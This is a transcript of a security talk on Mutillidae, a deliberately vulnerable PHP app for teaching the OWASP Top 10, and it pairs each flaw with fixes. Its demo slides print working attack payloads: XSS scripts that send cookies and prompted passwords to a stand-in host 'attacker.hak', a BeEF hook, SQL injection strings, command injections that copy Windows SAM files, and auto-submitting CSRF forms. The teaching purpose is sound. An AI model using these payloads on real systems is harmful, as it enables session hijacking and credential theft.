mutillidae a deliberately vulnerable set of php scripts that implement the owasp top 10 l.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10 PowerPoint Presentation
Download Presentation
Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10

Loading in 2 Seconds...

play fullscreen
1 / 33

Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10 - PowerPoint PPT Presentation


  • 677 Views
  • Uploaded on

Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10. Adrian Crenshaw. About Adrian. I run Irongeek.com I have an interest in InfoSec education I don’t know everything - I’m just a geek with time on my hands

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Mutillidae : A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10' - Ava


Download Now An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
mutillidae a deliberately vulnerable set of php scripts that implement the owasp top 10

Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10

Adrian Crenshaw

about adrian
About Adrian
  • I run Irongeek.com
  • I have an interest in InfoSec education
  • I don’t know everything - I’m just a geek with time on my hands
  • I’m also not a professional web developer, creating crappy code was easy or me. 
  • So why listen to me? Sometimes it takes a noob to teach a noob.
so what is this talk about
So, what is this talk about?
  • OWASP Top 10http://www.owasp.org/index.php/OWASP_Top_Ten_Project(As a side note, I’ve copied quite of few of their descriptions and fixes into this presentation)
  • Mutillidaehttp://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
  • Ok, but what are those?
the owasp top 10
The OWASP Top 10

The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.

The 2007 list includes:

  • A1 - Cross Site Scripting (XSS)
  • A2 - Injection Flaws
  • A3 - Malicious File Execution
  • A4 - Insecure Direct Object Reference
  • A5 - Cross Site Request Forgery (CSRF)
  • A6 - Information Leakage and Improper Error Handling
  • A7 - Broken Authentication and Session Management
  • A8 - Insecure Cryptographic Storage
  • A9 - Insecure Communications
  • A10 - Failure to Restrict URL Access
what s mutillidae
What’s Mutillidae?
  • A teaching tool for illustrating the OWASP 10
  • Written in PHP/MySQL
  • Meant to be simpler than WebGoat
  • Simple to exploit, just to get the concept across
  • Easy to reset
  • Includes a “Tips” function to help the student
installing mutillidae for the lazy
Installing Mutillidae for the lazy
  • Download Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
  • Grab XAMPP Lite and install ithttp://www.apachefriends.org/en/xampp.html
  • Put the Mutillidae files in \htdocs
  • May want to edit xampplite\apache\conf\httpd.conf and set “Listen 127.0.0.1:80 “
a1 cross site scripting xss
A1 - Cross Site Scripting (XSS)

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

demo time
Demo Time!!!
  • Simple:<script>alert("XSS");</script>
  • Page Redirect:<script>window.location = "http://www.irongeek.com/"</script>
  • Cookie Stealing:<script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>
demo time9
Demo Time!!!
  • Simple:<script>alert("XSS");</script>
  • Page Redirect:<script>window.location = "http://www.irongeek.com/"</script>
  • Cookie Stealing:<script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>
  • Password Con:<script>username=prompt('Please enter your username',' ');password=prompt('Please enter your password',' ');document.write("<imgsrc=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");</script>
demo time10
Demo Time!!!
  • External Javascript:<script src="http://ha.ckers.org/xss.js"></script>
  • Hot BeEF Injection:<script language='Javascript'src='http://localhost/beef/hook/beefmagic.js.php'></script>
  • How about the User Agent string?
links
Links
  • Mangle XSS to bypass filters: http://ha.ckers.org/xss.html
  • BeEF browser exploitation frameworkhttp://www.bindshell.net/tools/beef
  • XSS Me Firefox pluginhttps://addons.mozilla.org/en-US/firefox/addon/7598
  • Exotic Injection Vectors http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors
fixes
Fixes
  • Input validation.
  • Strong output encoding. htmlspecialchars()
  • Specify the output encoding.
  • Do not use "blacklist" validation to detect XSS in input or to encode output.
  • Watch out for canonicalization errors.
a2 injection flaws
A2 - Injection Flaws

Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

example
Example

The Code:

“SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password).”’”

or

echo shell_exec("nslookup " . $targethost);'“

Expected to fill in the string to:

SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’

or

Nslookupirongeek.com

But what if the person injected:

SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’

or

Nslookupirongeek.com && del *.*

demo time15
Demo Time!!!
  • Simple SQL Injection:' or 1=1 --
  • Wish I could do this, but can't stack in MySQL/PHP '; DROP TABLE owasp10; --
  • Command Injections:&& dir&& wmic process list&& wmicuseraccount list&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
  • (use ; as a separator if you are running this on Linux)
links16
Links
  • SQL Injection Cheat Sheethttp://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
  • SQL Injection Attacks by Example http://unixwiz.net/techtips/sql-injection.html
  • Command line Kung Fuhttp://blog.commandlinekungfu.com/
fixes17
Fixes
  • Input validation.
  • Use strongly typed parameterized query APIs (bound parameters).
  • Enforce least privilege.
  • Avoid detailed error messages.
  • Show care when using stored procedures.
  • Do not use dynamic query interfaces.
  • Do not use simple escaping functions.
  • Watch out for canonicalization errors.
a3 malicious file execution
A3 - Malicious File Execution

Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.

demo time19
Demo time!!!
  • Grabbing a local file:http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc
  • Tamper Data, POST data and an inadvertent proxy
links20
Links
  • Tamper Data Firefox Pluginhttps://addons.mozilla.org/en-US/firefox/addon/966
  • Paroshttp://www.parosproxy.org/index.shtml
  • WebScarabhttp://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
fixes21
Fixes
  • Strongly validate user input using "accept known good" as a strategy
  • Add firewall rules to prevent web servers making new connections to external web sites and internal systems.
  • Consider implementing a chroot jail or other sand box mechanisms.
  • # PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider .building PHP locally to not include this functionality.
  • # PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
  • # PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.
a4 insecure direct object reference
A4 - Insecure Direct Object Reference

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

demo time23
Demo Time!!!
  • You already saw it with the malicious file include demo.
fixes24
Fixes
  • Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.
  • Validate any private object references extensively with an "accept known good" approach.
  • Verify authorization to all referenced objects.
a5 cross site request forgery csrf
A5 - Cross Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

csrf xsrf illustration
CSRF/XSRF Illustration

Session established with web app via a cookie. (already logged in)

At some later point, content that the attacker controls is requested.

Attacker serves up content that asks client’s browser to make a request.

Client makes request, and since it already has a session cookie the request is honored.

Website the attacker controls

Target Web App

3

1

4

2

Client

demo time27
Demo Time!!!
  • Let visit a page with this lovely link: <imgsrc="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
  • Don’t want to use a bad image? Try an Iframe: <iframesrc="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>
  • Can’t use the GET method? Try something like:<html> <body><form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"><input type='hidden' name='input_from_form' value="Test of of auto submitted form."></form><script>document.csrfform.submit()</script> </body></html>
links28
Links
  • CSRF Flaws Found On Major Websites, Including a Bank http://it.slashdot.org/article.pl?sid=08/09/30/0136219
  • CSRF Home Router Funhttp://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/
  • CSRF in Gmailhttp://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
fixes29
Fixes
  • For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.
  • Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)
  • POST alone is insufficient protection.
  • Consider adding Captchas and extra sessions values as hidden form elements.
other projects like mutillidae
Other Projects Like Mutillidae
  • Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security
useful tool collections
Useful tool collections
  • SamuraiWTFhttp://samurai.inguardians.com/
  • OWASP Live CDhttp://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
  • BackTrackhttp://www.remote-exploit.org/backtrack.html
events
Events
  • Free ISSA classes
  • ISSA Meetinghttp://issa-kentuckiana.org/
  • Louisville Infosechttp://www.louisvilleinfosec.com/
  • Phreaknic/Notacon/Outerz0nehttp://phreaknic.infohttp://notacon.org/http://www.outerz0ne.org/